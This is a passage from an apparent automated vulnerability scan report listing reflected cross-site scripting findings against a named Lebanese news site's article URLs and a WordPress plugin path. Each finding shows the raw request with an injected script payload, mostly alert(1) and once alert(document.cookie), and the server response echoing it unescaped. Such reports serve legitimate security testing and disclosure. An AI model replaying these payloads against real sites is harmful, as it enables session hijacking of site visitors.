GET /music-scene/201081402"><script>alert(1)</script>a730c9df6b2/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 HTTP/1.1
Host: starscene.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:03:52 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=n8hb7utbvn3u89gr4auv5dm5f3; path=/
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 16:03:52 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 16:03:52 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/music-scene/201081402\"><script>alert(1)</script>a730c9df6b2/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22'; }); return true;" >
...[SNIP]...

4.191. http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df173"><script>alert(1)</script>06915548014 was submitted in the REST URL parameter 3. This input was echoed as df173\"><script>alert(1)</script>06915548014 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /music-scene/2010/11df173"><script>alert(1)</script>06915548014/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 HTTP/1.1
Host: starscene.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=mnk1ekv0l7qhvftnveimin27t7; path=/
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 16:04:11 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 16:04:11 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/music-scene/2010/11df173\"><script>alert(1)</script>06915548014/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22'; }); return true;" >
...[SNIP]...

4.192. http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2f50"><script>alert(1)</script>fe8bd646812 was submitted in the REST URL parameter 4. This input was echoed as e2f50\"><script>alert(1)</script>fe8bd646812 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-halle2f50"><script>alert(1)</script>fe8bd646812/x22 HTTP/1.1
Host: starscene.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=5cgd55tpqcii02hiik54n184h3; path=/
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 16:04:28 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 16:04:28 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-halle2f50\"><script>alert(1)</script>fe8bd646812/x22'; }); return true;" >
...[SNIP]...

4.193. http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 317bf"><script>alert(1)</script>7cea82c0756 was submitted in the REST URL parameter 5. This input was echoed as 317bf\"><script>alert(1)</script>7cea82c0756 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22317bf"><script>alert(1)</script>7cea82c0756 HTTP/1.1
Host: starscene.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:45 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=osrr4es1khehpbsg2bdcc0cic4; path=/
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 16:04:45 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 16:04:45 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22317bf\"><script>alert(1)</script>7cea82c0756'; }); return true;" >
...[SNIP]...

4.194. http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2fad"><script>alert(1)</script>848aa3101ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d2fad\"><script>alert(1)</script>848aa3101ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22?d2fad"><script>alert(1)</script>848aa3101ef=1 HTTP/1.1
Host: starscene.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=69d27e147f4cc463cfb778d7ebaddd75
Set-Cookie: PHPSESSID=5picprkcup404b60pv5q8khbh4; path=/
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 16:02:57 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 16:02:57 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51089

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22?d2fad\"><script>alert(1)</script>848aa3101ef=1'; }); return true;" >
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/index.php

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee649"><script>alert(1)</script>343c7fa038d was submitted in the REST URL parameter 6. This input was echoed as ee649\"><script>alert(1)</script>343c7fa038d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/index.phpee649"><script>alert(1)</script>343c7fa038d HTTP/1.1
Host: starscene.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; lastpost=b5ecd3c5dc5b053e7b22b8e1502a67b3; PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510; fbsetting_018ba7e06c4505193be6bdac2b0628d9=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; crep=show;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 23:22:45 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 23:22:45 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 23:22:45 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
ect.requireSession(function() { window.location='/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/index.phpee649\"><script>alert(1)</script>343c7fa038d'; }); return true;" >
...[SNIP]...

4.196. http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f700"><script>alert(1)</script>6bdd23bb74f was submitted in the REST URL parameter 1. This input was echoed as 4f700\"><script>alert(1)</script>6bdd23bb74f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content4f700"><script>alert(1)</script>6bdd23bb74f/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:10:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:10:02 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:10:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content4f700\"><script>alert(1)</script>6bdd23bb74f/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.197. http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b75c3"><script>alert(1)</script>5f63b93ea21 was submitted in the REST URL parameter 2. This input was echoed as b75c3\"><script>alert(1)</script>5f63b93ea21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsb75c3"><script>alert(1)</script>5f63b93ea21/cool-ryan-easy-popups/lib/css/redmond/custom.css?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:11:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:11:21 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:11:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/pluginsb75c3\"><script>alert(1)</script>5f63b93ea21/cool-ryan-easy-popups/lib/css/redmond/custom.css?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.198. http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 293b2"><script>alert(1)</script>c4fe96232b6 was submitted in the REST URL parameter 3. This input was echoed as 293b2\"><script>alert(1)</script>c4fe96232b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/cool-ryan-easy-popups293b2"><script>alert(1)</script>c4fe96232b6/lib/css/redmond/custom.css?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:24 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/cool-ryan-easy-popups293b2\"><script>alert(1)</script>c4fe96232b6/lib/css/redmond/custom.css?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.199. http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f66f4"><script>alert(1)</script>99dd70eac0b was submitted in the REST URL parameter 4. This input was echoed as f66f4\"><script>alert(1)</script>99dd70eac0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/cool-ryan-easy-popups/libf66f4"><script>alert(1)</script>99dd70eac0b/css/redmond/custom.css?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:13:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:14:03 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:14:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/cool-ryan-easy-popups/libf66f4\"><script>alert(1)</script>99dd70eac0b/css/redmond/custom.css?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.200. http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64982"><script>alert(1)</script>2aae682cb86 was submitted in the REST URL parameter 5. This input was echoed as 64982\"><script>alert(1)</script>2aae682cb86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/cool-ryan-easy-popups/lib/css64982"><script>alert(1)</script>2aae682cb86/redmond/custom.css?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:15:48 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:15:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/cool-ryan-easy-popups/lib/css64982\"><script>alert(1)</script>2aae682cb86/redmond/custom.css?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.201. http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56ad2"><script>alert(1)</script>281b5578e7d was submitted in the REST URL parameter 6. This input was echoed as 56ad2\"><script>alert(1)</script>281b5578e7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond56ad2"><script>alert(1)</script>281b5578e7d/custom.css?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:17:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:17:28 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:17:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond56ad2\"><script>alert(1)</script>281b5578e7d/custom.css?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.202. http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css [REST URL parameter 7] previous next

Summary

Severity:	High
